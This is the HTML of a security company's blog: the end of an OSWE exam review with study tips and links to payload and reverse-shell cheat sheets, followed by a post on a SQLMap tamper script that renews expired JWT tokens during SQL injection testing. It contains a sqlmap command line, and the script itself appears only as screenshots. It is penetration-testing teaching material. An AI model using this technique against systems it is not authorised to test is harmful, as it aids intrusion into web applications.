<span lang="EN-US" style="font-family: Candara;">During the exam, I had not rested enough and it started to affect my performance, therefore my recommendation is that if you start feeling tired, go sleep for a bit and then resume as this will help you to think clearer.<o:p></o:p></span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">A few other suggestions from my experience is to remember to get up and take a walk every few hours and don’t forget to take screenshots as you solve the challenges in the exam.<o:p></o:p></span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">Lastly, try not to stress too much about the exam, try to think of it as a challenge that you are trying to solve, rather than an exam itself.<o:p></o:p></span></div>
<h3>
<b><u><span lang="EN-US" style="font-family: Candara;">Important material to read before undertaking this course:</span></u></b></h3>
<div>
<b><u><span lang="EN-US" style="font-family: Candara;"><br /></span></u></b></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">Below is a list of content material that I would recommend that you read and work through before you undertake the OSWE course:</span></div>
<div class="MsoNormal" style="-webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
</div>
<ul>
<li><span lang="EN-US" style="font-family: Candara; font-size: 11pt; text-indent: -0.25in;">“The Web Application hackers handbook” (</span><span lang="EN-US" style="font-size: 11pt; text-indent: -0.25in;"><a href="https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470"><span style="font-family: Candara;">https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470</span></a></span><span class="MsoHyperlink" style="font-size: 11pt; text-indent: -0.25in;"><span lang="EN-US" style="font-family: Candara;">)</span></span></li>
<li><a href="https://github.com/swisskyrepo/PayloadsAllTheThings" style="font-family: Candara; font-size: 11pt; text-indent: -0.25in;">https://github.com/swisskyrepo/PayloadsAllTheThings</a></li>
<li><span lang="EN-US" style="font-family: Candara; font-size: 11pt; text-indent: -0.25in;">Pentest monkey will be helpful for some reverse shell cheat sheets (</span><span lang="EN-US" style="font-size: 11pt; text-indent: -0.25in;"><a href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet"><span style="font-family: Candara;">http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet</span></a></span><span lang="EN-US" style="font-family: Candara; font-size: 11pt; text-indent: -0.25in;">)</span></li>
<li><span lang="EN-US" style="font-family: Candara; font-size: 11pt; text-indent: -0.25in;">Deserialization attacks on .NET (</span><span lang="EN-US" style="font-size: 11pt; text-indent: -0.25in;"><a href="https://www.youtube.com/watch?v=eDfGpu3iE4Q"><span style="font-family: Candara;">https://www.youtube.com/watch?v=eDfGpu3iE4Q</span></a></span><span lang="EN-US" style="font-family: Candara; font-size: 11pt; text-indent: -0.25in;">)</span></li>
<li><span lang="EN-US" style="font-family: Candara; font-size: 11pt; text-indent: -0.25in;">Deserialization on several coding languages (</span><span lang="EN-US" style="font-size: 11pt; text-indent: -0.25in;"><a href="https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html"><span style="font-family: Candara;">https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html</span></a></span><span lang="EN-US" style="font-family: Candara; font-size: 11pt; text-indent: -0.25in;">)</span><b style="font-size: 11pt;"><u><span lang="EN-US" style="font-family: Candara;"> </span></u></b></li>
</ul>
<br />
<h2>
<b><u><span lang="EN-US" style="font-family: Candara;">Summary:</span></u></b></h2>
<style class="WebKit-mso-list-quirks-style">
<!--
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-parent:"";
margin-top:0in;
margin-right:0in;
margin-bottom:8.0pt;
margin-left:0in;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:Calibri;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;
mso-ansi-language:EN-US;}
a:link, span.MsoHyperlink
{mso-style-noshow:yes;
mso-style-priority:99;
color:blue;
text-decoration:underline;
text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
{mso-style-noshow:yes;
mso-style-priority:99;
color:#954F72;
mso-themecolor:followedhyperlink;
text-decoration:underline;
text-underline:single;}
p.MsoListParagraph, li.MsoListParagraph, div.MsoListParagraph
{mso-style-priority:34;
mso-style-unhide:no;
mso-style-qformat:yes;
margin-top:0in;
margin-right:0in;
margin-bottom:8.0pt;
margin-left:.5in;
mso-add-space:auto;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:Calibri;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;
mso-ansi-language:EN-US;}
p.MsoListParagraphCxSpFirst, li.MsoListParagraphCxSpFirst, div.MsoListParagraphCxSpFirst
{mso-style-priority:34;
mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-type:export-only;
margin-top:0in;
margin-right:0in;
margin-bottom:0in;
margin-left:.5in;
margin-bottom:.0001pt;
mso-add-space:auto;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:Calibri;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;
mso-ansi-language:EN-US;}
p.MsoListParagraphCxSpMiddle, li.MsoListParagraphCxSpMiddle, div.MsoListParagraphCxSpMiddle
{mso-style-priority:34;
mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-type:export-only;
margin-top:0in;
margin-right:0in;
margin-bottom:0in;
margin-left:.5in;
margin-bottom:.0001pt;
mso-add-space:auto;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:Calibri;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;
mso-ansi-language:EN-US;}
p.MsoListParagraphCxSpLast, li.MsoListParagraphCxSpLast, div.MsoListParagraphCxSpLast
{mso-style-priority:34;
mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-type:export-only;
margin-top:0in;
margin-right:0in;
margin-bottom:8.0pt;
margin-left:.5in;
mso-add-space:auto;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:Calibri;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;
mso-ansi-language:EN-US;}
.MsoChpDefault
{mso-style-type:export-only;
mso-default-props:yes;
font-size:11.0pt;
mso-ansi-font-size:11.0pt;
mso-bidi-font-size:11.0pt;
font-family:Calibri;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;
mso-ansi-language:EN-US;}
.MsoPapDefault
{mso-style-type:export-only;
margin-bottom:8.0pt;
line-height:107%;}
@page WordSection1
{size:8.5in 11.0in;
margin:1.0in 1.0in 1.0in 1.0in;
mso-header-margin:.5in;
mso-footer-margin:.5in;
mso-paper-source:0;}
div.WordSection1
{page:WordSection1;}
/* List Definitions */
@list l0
{mso-list-id:604970059;
mso-list-type:hybrid;
mso-list-template-ids:1471021150 67698691 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;}
@list l0:level1
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:1.0in;
text-indent:-.25in;
font-family:"Courier New";}
@list l0:level2
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:1.5in;
text-indent:-.25in;
font-family:"Courier New";}
@list l0:level3
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:2.0in;
text-indent:-.25in;
font-family:Wingdings;}
@list l0:level4
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:2.5in;
text-indent:-.25in;
font-family:Symbol;}
@list l0:level5
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:3.0in;
text-indent:-.25in;
font-family:"Courier New";}
@list l0:level6
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:3.5in;
text-indent:-.25in;
font-family:Wingdings;}
@list l0:level7
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:4.0in;
text-indent:-.25in;
font-family:Symbol;}
@list l0:level8
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:4.5in;
text-indent:-.25in;
font-family:"Courier New";}
@list l0:level9
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:5.0in;
text-indent:-.25in;
font-family:Wingdings;}
@list l1
{mso-list-id:1060328114;
mso-list-type:hybrid;
mso-list-template-ids:-1081202348 67698703 67698713 67698715 67698703 67698713 67698715 67698703 67698713 67698715;}
@list l1:level1
{mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;}
@list l1:level2
{mso-level-number-format:alpha-lower;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;}
@list l1:level3
{mso-level-number-format:roman-lower;
mso-level-tab-stop:none;
mso-level-number-position:right;
text-indent:-9.0pt;}
@list l1:level4
{mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;}
@list l1:level5
{mso-level-number-format:alpha-lower;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;}
@list l1:level6
{mso-level-number-format:roman-lower;
mso-level-tab-stop:none;
mso-level-number-position:right;
text-indent:-9.0pt;}
@list l1:level7
{mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;}
@list l1:level8
{mso-level-number-format:alpha-lower;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;}
@list l1:level9
{mso-level-number-format:roman-lower;
mso-level-tab-stop:none;
mso-level-number-position:right;
text-indent:-9.0pt;}
@list l2
{mso-list-id:1283413612;
mso-list-type:hybrid;
mso-list-template-ids:1092375940 67698691 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;}
@list l2:level1
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:56.25pt;
text-indent:-.25in;
font-family:"Courier New";}
@list l2:level2
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:92.25pt;
text-indent:-.25in;
font-family:"Courier New";}
@list l2:level3
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:128.25pt;
text-indent:-.25in;
font-family:Wingdings;}
@list l2:level4
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:164.25pt;
text-indent:-.25in;
font-family:Symbol;}
@list l2:level5
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:200.25pt;
text-indent:-.25in;
font-family:"Courier New";}
@list l2:level6
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:236.25pt;
text-indent:-.25in;
font-family:Wingdings;}
@list l2:level7
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:272.25pt;
text-indent:-.25in;
font-family:Symbol;}
@list l2:level8
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:308.25pt;
text-indent:-.25in;
font-family:"Courier New";}
@list l2:level9
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:344.25pt;
text-indent:-.25in;
font-family:Wingdings;}
@list l3
{mso-list-id:1608738124;
mso-list-type:hybrid;
mso-list-template-ids:-355859120 67698689 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;}
@list l3:level1
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l3:level2
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l3:level3
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l3:level4
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l3:level5
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l3:level6
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l3:level7
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l3:level8
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l3:level9
{mso-level-number-format:bullet;
mso-level-text:;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l4
{mso-list-id:1856191801;
mso-list-type:hybrid;
mso-list-template-ids:-1081202348 67698703 67698713 67698715 67698703 67698713 67698715 67698703 67698713 67698715;}
@list l4:level1
{mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level2
{mso-level-number-format:alpha-lower;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level3
{mso-level-number-format:roman-lower;
mso-level-tab-stop:none;
mso-level-number-position:right;
text-indent:-9.0pt;}
@list l4:level4
{mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level5
{mso-level-number-format:alpha-lower;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level6
{mso-level-number-format:roman-lower;
mso-level-tab-stop:none;
mso-level-number-position:right;
text-indent:-9.0pt;}
@list l4:level7
{mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level8
{mso-level-number-format:alpha-lower;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level9
{mso-level-number-format:roman-lower;
mso-level-tab-stop:none;
mso-level-number-position:right;
text-indent:-9.0pt;}
-->
</style><br />
<div class="MsoNormal" style="line-height: 15.693333625793457px;">
<span lang="EN-US" style="font-family: Candara;">OSWE is a very good course for people looking to improve their source code review skills as well as learning how to detect bugs and vulnerabilities by searching for them in the code itself. I would recommend that you book your exam not long after your lab time ends, so that the information you have learned will be fresh and ready to be used. Overall I enjoyed my OSWE experience and would therefore recommend it to others.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: 15.693333625793457px;">
<span lang="EN-US" style="font-family: Candara;">- Blog post by Motaz of Telspace Systems</span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-70702048798693710762020-05-20T11:02:00.000+02:002020-05-20T11:02:46.363+02:00Bypassing refresh tokens with SQLMap’s tamper scripts<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: left; float: left; font-size: 11px; margin-bottom: 1em; margin-right: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: left; float: left; font-size: 11px; margin-bottom: 1em; margin-right: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: left; float: left; font-size: 11px; margin-bottom: 1em; margin-right: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: left; float: left; font-size: 11px; margin-bottom: 1em; margin-right: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: left; float: left; font-size: 11px; margin-bottom: 1em; margin-right: 1em;"></a></div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<div style="text-align: left;">
<br />
<br />
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">In this blog post, I will be taking you through how to make use </span><span style="font-size: large;">of the “--tamper” parameter of the SQLMap tool to bypass the limitations of a web application using JWT tokens.</span></div>
</div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">A function of web applications that use JWT tokens is to make the token expire after a certain period of time. This then results in you receiving an error 401 message in the web application, meaning that you don’t have the correct privileges to use that specific web application or endpoint.</span></div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;"><br /></span></div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;">During a recent assessment, I came across a web application, which made use of JWT tokens for its authentication process. After token expiry, a request should always be sent to the application to reauthorise access and get a new token.</span></div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;"><br /></span></div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;">When using SQLMap to test a web application against potential SQL injection vulnerabilities, this became an issue, as the application would re-authenticate and a new token was issued, which would then result in an error 401 message.</span></div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;"><br /></span></div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;">I came up with a solution to this problem when using SQLMap, by requesting a new token and then changing the authorisation header which would then result in this problem being bypassed. </span></div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;"><br /></span></div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;">Below is the example of how this was successfully achieved.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0DmZ6IWF-5ddLMvYB9SXupxziC97FL9OKrk6NgvRoIrijGlhiHVNlr9cK8x2WfHS2okMjjLbIL25b8OwgtnzHVLkXZNr_a3rbtaOIXAfwbpmD6T9_c2VtNXxazZiU2E4Cnj1ZzjGYCuc2/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="194" data-original-width="599" height="204" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0DmZ6IWF-5ddLMvYB9SXupxziC97FL9OKrk6NgvRoIrijGlhiHVNlr9cK8x2WfHS2okMjjLbIL25b8OwgtnzHVLkXZNr_a3rbtaOIXAfwbpmD6T9_c2VtNXxazZiU2E4Cnj1ZzjGYCuc2/s640/1.png" width="640" /></a></div>
<br />
<div style="font-family: Candara; font-size: 11px; font-stretch: normal; line-height: normal; margin-bottom: 8px; text-align: center;">
First the request for a new token was sent to the application:</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">As can be seen below, this request then responded back with JSON, containing an “access_token” which could then be used in the next request:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidFfXBwVkMnIy6LT0yIEkMup0ZoDJBUY-m61TBEgYHOgRDB9zAQR1KWqlxs4J6_b2vPPovelYyKbYE4cZUHzaBpD9FNSVKBSmNLCPHZ4vwuHYpXZCydP8IVfJC2ofI3g0T63RZE2T0p0y5/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="327" data-original-width="1372" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidFfXBwVkMnIy6LT0yIEkMup0ZoDJBUY-m61TBEgYHOgRDB9zAQR1KWqlxs4J6_b2vPPovelYyKbYE4cZUHzaBpD9FNSVKBSmNLCPHZ4vwuHYpXZCydP8IVfJC2ofI3g0T63RZE2T0p0y5/s640/2.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="font-family: Candara; font-size: 11px; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<br /></div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;">For the next step, I then used Python to recreate the POST request in a script. In the screenshot below, you can see the code that was used for the POST request:</span></div>
<div style="font-family: Candara; font-size: 11px; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF6IIh-FZ4pJCwTB4scDgnxIcqHJgM_T_BR5LIC5iLH9VXQwR6SKQskRXPvY3CYUlVR7U24F6tmCbCP_SGYYP9yF5Hlnni18WAkfzhSQCMZ6nh4DaR1ZfKw9-8tnGhxVThNatNxmsutwFy/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="112" data-original-width="468" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF6IIh-FZ4pJCwTB4scDgnxIcqHJgM_T_BR5LIC5iLH9VXQwR6SKQskRXPvY3CYUlVR7U24F6tmCbCP_SGYYP9yF5Hlnni18WAkfzhSQCMZ6nh4DaR1ZfKw9-8tnGhxVThNatNxmsutwFy/s640/3.png" width="640" /></a></div>
<div style="font-family: Candara; font-size: 11px; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<br /></div>
<div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;">In addition to the above code, the authorisation header should be rewritten with new information before every request that is sent by SQLMap, as can be seen below:</span></div>
<div style="font-family: Candara; font-size: 11px; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_Wm2M6VVwhZV4C6vA8jRVV9GlNIjzuV66cAqgvLZo_bSmX95Flb3_HxBWF2oZGEIwtDJvyzbIP-JfFOLyx2iFyNUUkcH-bDAs_2kRlMqGsxzWmZMUzQiLMQmaFdCJRhIxiYR_t8NSklX_/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="194" data-original-width="468" height="264" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_Wm2M6VVwhZV4C6vA8jRVV9GlNIjzuV66cAqgvLZo_bSmX95Flb3_HxBWF2oZGEIwtDJvyzbIP-JfFOLyx2iFyNUUkcH-bDAs_2kRlMqGsxzWmZMUzQiLMQmaFdCJRhIxiYR_t8NSklX_/s640/4.png" width="640" /></a></div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;">The full tamper script should then look like the code in the screenshot below:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhknDkNSM9flxODQSs-sEorX78KOeighilmN4QTXFIcjKi7rzB69FF6sDZj2ZEnYYopM5izvGbgaDcW90SHeGdi2uZ-0VLgDrTqNicS-N7l9gt9KS1T3rPdPiAsDCj9Ls6kS-aXdNMzfb8R/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="564" data-original-width="468" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhknDkNSM9flxODQSs-sEorX78KOeighilmN4QTXFIcjKi7rzB69FF6sDZj2ZEnYYopM5izvGbgaDcW90SHeGdi2uZ-0VLgDrTqNicS-N7l9gt9KS1T3rPdPiAsDCj9Ls6kS-aXdNMzfb8R/s640/5.png" width="529" /></a></div>
<div style="font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: left; float: left; font-family: Candara; font-size: 11px; margin-bottom: 1em; margin-right: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: left; float: left; font-family: Candara; font-size: 11px; margin-bottom: 1em; margin-right: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: left; float: left; font-family: Candara; font-size: 11px; margin-bottom: 1em; margin-right: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: left; float: left; font-family: Candara; font-size: 11px; margin-bottom: 1em; margin-right: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: left; float: left; font-family: Candara; font-size: 11px; margin-bottom: 1em; margin-right: 1em;"></a><span style="font-size: large;"><span style="font-family: "candara";">Lastly, in the screenshot below you can see the command for executing the tamper script against a target using SQLMap(</span><i>sqlmap -u <a href="https://url.com/">https://url.com/</a> --tamper bypass.py</i>)<span style="font-family: "candara";">:</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMU7UUji78h0oKlhyMmXVfgSRIRuapHsLmEFNLsP_wcJmIea0cqn49od1beC47E5HJj_wowQKVZIRqMtQ_F0Lcpm_GrSVPTrn78mEfaIq0wGbbEYt_tC9WNV3i3P0zzHcS9JnAp-L7XSah/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="478" data-original-width="974" height="312" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMU7UUji78h0oKlhyMmXVfgSRIRuapHsLmEFNLsP_wcJmIea0cqn49od1beC47E5HJj_wowQKVZIRqMtQ_F0Lcpm_GrSVPTrn78mEfaIq0wGbbEYt_tC9WNV3i3P0zzHcS9JnAp-L7XSah/s640/6.png" width="640" /></a></div>
<div>
<br /></div>
<br />
<div style="font-family: Candara; font-size: 11px; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
</div>
